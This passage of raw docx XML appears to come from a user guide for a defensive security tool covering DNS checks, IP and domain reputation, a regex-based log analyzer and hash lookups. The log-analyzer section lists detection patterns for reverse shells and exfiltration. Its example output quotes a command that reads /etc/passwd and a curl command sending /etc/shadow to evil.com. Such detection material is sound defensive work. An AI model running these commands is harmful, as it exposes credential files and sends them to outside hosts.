            <w:tcW w:type="dxa" w:w="3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Security Relevance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IPv4 address of the domain</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Server location, hosting provider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AAAA</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IPv6 address of the domain</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Dual-stack exposure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MX</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Mail servers with priority</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Email infrastructure mapping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Authoritative nameservers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DNS hijacking risk, registrar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TXT</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SPF, DKIM, verification records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Email spoofing protection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CNAME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Alias/canonical name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Subdomain takeover risk</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SOA</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Start of authority record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Zone transfer config, admin contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 Reverse DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps an IP address back to its hostname using PTR records. Useful for identifying what server an IP belongs to, verifying mail server configuration, and correlating IPs found in logs with domain names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.3 DNS Zone Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks email security DNS records:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SPF (Sender Policy Framework): verifies which servers are authorized to send email for the domain. Missing SPF allows anyone to spoof emails from the domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DMARC (Domain-based Message Authentication): policy for handling emails that fail SPF/DKIM. Missing DMARC means no enforcement of email authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DKIM (DomainKeys Identified Mail): cryptographic email signing. Detects whether the domain publishes signing keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. IP &amp; DOMAIN REPUTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 IP Reputation Check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries threat intelligence feeds to determine if an IP address has been reported for malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What It Checks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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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What It Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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API Key Required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AbuseIPDB</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Abuse confidence score (0–100%), report count, categories (spam, brute-force, DDoS, etc.), ISP, country, usage type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Yes (ABUSEIPDB_API_KEY)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Shodan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Open ports, services, OS detection, known vulnerabilities, hostnames, ISP, last seen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Yes (SHODAN_API_KEY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Domain Reputation Check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries VirusTotal to check if a domain has been flagged by security vendors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What It Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection ratio: how many out of 70+ security engines flag the domain as malicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Categories: malware, phishing, suspicious, spam, clean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS information and registrar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS resolution history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Last analysis date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1565C0" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires VIRUSTOTAL_API_KEY in .env. Without it, domain reputation is limited to DNS-based checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. SECURITY LOG ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The log analyzer scans security logs (server logs, auth logs, web access logs, Windows event logs) for attack patterns using regex-based detection. It works entirely locally — no data leaves the device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Attack Patterns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Attack Pattern</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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What It Looks For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Brute Force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Repeated failed login/password/auth attempts from same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SQL Injection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UNION SELECT, OR 1=1, DROP TABLE, comment markers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XSS Attempt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&lt;script&gt; tags, javascript: URIs, inline event handlers (onload=, onerror=)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Path Traversal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 sequences attempting to access files outside web root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Command Injection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Shell commands in input (cat, ls, whoami, wget, curl), backtick execution, $() subshells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Privilege Escalation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sudo, su root, chmod 777/477, setuid bit changes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Data Exfiltration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curl with POST data, wget POST, netcat reverse shells, /dev/tcp connections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Malware Indicators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PowerShell encoded commands, certutil decode, bitsadmin transfer (Living-off-the-Land)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Suspicious User-Agent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LOW</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Known attack tools: Nikto, SQLMap, Nmap, Masscan, Burp Suite, DirBuster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Encoded Payload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Long Base64-encoded strings (40+ characters) that may contain obfuscated commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Additional Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Source IP frequency: counts how many times each IP appears in logs, identifies top 10 most active sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity breakdown: counts CRITICAL, HIGH, MEDIUM, LOW findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log type support: generic server logs, Apache/Nginx access logs, Linux auth logs, Windows event logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Actionable recommendations: generated based on findings (e.g., block IPs, review WAF rules, isolate systems)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Example Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">## Log Analysis Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lines Analyzed: 1,247</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Threats Detected: 23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity Breakdown: {CRITICAL: 3, HIGH: 8, MEDIUM: 10, LOW: 2}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">### CRITICAL Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- [Line 847] Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  `192.168.1.55 - POST /api?cmd=;cat /etc/passwd`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- [Line 1102] Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  `10.0.0.9 - curl -d @/etc/shadow https://evil.com/collect`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. FILE HASH / MALWARE CHECK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 What It Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifies a file's hash fingerprint against VirusTotal's database of 70+ antivirus engines to determine if the file is known malware, suspicious, or clean.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Supported Hash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Hash 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Length</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Example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MD5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32 characters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d41d8cd98f00b204e9800998ecf8427e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SHA-1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40 characters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da39a3ee5e6b4b0d3255bfef95601890afd80709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SHA-256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64 characters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e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 What It Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection ratio (e.g., 45/72 engines flagged as malicious)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Individual engine verdicts (Kaspersky, Symantec, CrowdStrike, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware family name and category (trojan, ransomware, worm, PUP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen and last analysis dates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File type and size information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1565C0" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
